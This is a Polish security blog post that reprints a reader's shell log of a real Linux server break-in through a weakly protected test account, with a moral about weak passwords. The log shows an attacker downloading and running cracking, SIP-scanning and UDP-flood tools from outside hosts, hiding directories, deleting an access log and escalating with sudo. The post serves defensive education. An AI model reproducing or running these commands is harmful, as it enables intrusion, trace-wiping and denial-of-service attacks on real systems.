HARD CORE SECURITY LAB: Historia pewnego włamania, oczywiście z morałem

02 listopada 2010

Historia pewnego włamania, oczywiście z morałem

wtorek, listopada 02, 2010 | Autor: \m/ojtek

Czytelnicy HARD CORE SECURITY LAB na pewno tak skutecznie zabezpieczają swe serwery, stacje robocze, a nawet podręczne elektroniczne gadżety, że z pewnością nie mogą zbyt często oglądać prawdziwego włamywacza w trakcie skutecznego penetrowania jakiegoś systemu. Dla wszystkich zainteresowanych dokładnym przebiegiem przykładowego włamania na serwer Linuksowy, mam więc małą niespodziankę. Oto historia pewnego autentycznego włamania.

Pewien czytelnik podesłał mi bardzo interesujący log dokumentujący skuteczne włamanie na jeden z jego własnych serwerów. Zobaczmy więc, jak doszło do całego zdarzenia oraz co też włamywacz kombinował już po uzyskaniu dostępu do systemu...

Wszystko zaczęło się od tego, że nieroztropny administrator założył sobie konto testowe o nazwie test, zabezpieczone hasłem... z resztą sami zgadnijcie jakim. Za pomocą tych prostych poświadczeń, do systemu na prawach zwykłego użytkownika dostał się włamywacz i natychmiast zaczął się bawić w najlepsze. Wszystko wyglądało dokładnie tak:

ls

echo pwd

echo $PWD

mkdir www

cd www/

vim index.html

w

uname -a

hostname -f

passwd

cat /proc/cpuinfo

cd /dev/shm

ls -a

cD ""

mkdir " "

cd " "

ls -a

cd /home/test

mkdir " "

cd " "

wget www.cipyback.home.ro/xxx.tar

tar xvf nou.tar

rm -rf nou.tar

cd probe/

./crack xxx.65

w

cd ..

rm -rf probe/

cd ..

rm -rf test/

w

cd /home

ls -a

last -20

cat /proc/cpuinfo

uname -a

w

cd /home

ls -a

cd ..

ls -a

rm -rf sipscan7.1/

w

ps ax

kill -9 17604

w

cd /home

ls -a

last -20

hostname -f

w

ls -a

w

cd /dev/shm

ls -a

mkdir " "

cd " "

cd /home/test

wget teamhacking.netfirms.com/xxx.tgz

tar zxvf sip.tgz

rm -rf sip.tgz

cd sipscan7.1/

nano email

screen

w

cd /dev/shm

cd

cD " "

cd /dev/shm

cd " "

mkdir " "

cd " "

cd /home/test

ls -a

cd " "

ls -a

wget www.cipyback.home.ro/xxx.tar

tar xvf nou.tar

rm -rf nou.tar

cd probe/

./crack xx.16

cd " "

ls -a

cd ..

ls -a

rm -rf .access.log/

cd " "

ls -a

cd probe/

ls -a

cat vuln.txt

./crack xx.52

cd /home/test

wget corleone.athost.biz/xxx.tgz

tar zxvf sip.tgz

rm -rf sip.tgz

cd aloha/

ls -a

nano mail_to.test

nano mail_to.txt

screen

./svmap.py xxx.0.0.0-xxx.255.255.255

Po uzyskaniu uprawnień administracyjnych, zabawa trwała w najlepsze:

sudo -s

uname -a

exit

w

ps -x

cd /var/tmp

ls -a

cd " "

ls -a

cd ..

wget pibo.com/.x/flood/xxx.tar

tar zxvf udp.tar

rm -rf udp.tar

chmod +x *

perl udp.pl xxx.102.52.202 0 0

Ciekaw jestem, jak oceniacie umiejętności oraz narzędzia wykorzystane przez tego włamywacza? Jedno jest natomiast pewne. Tworzenie testowych kont zabezpieczonych bardzo słabymi hasłami nigdy nie jest dobrym pomysłem i jest to jedna z najczęstszych furtek otwierających włamywaczom drogę do wielu serwerów oraz usług pracujących w Internecie.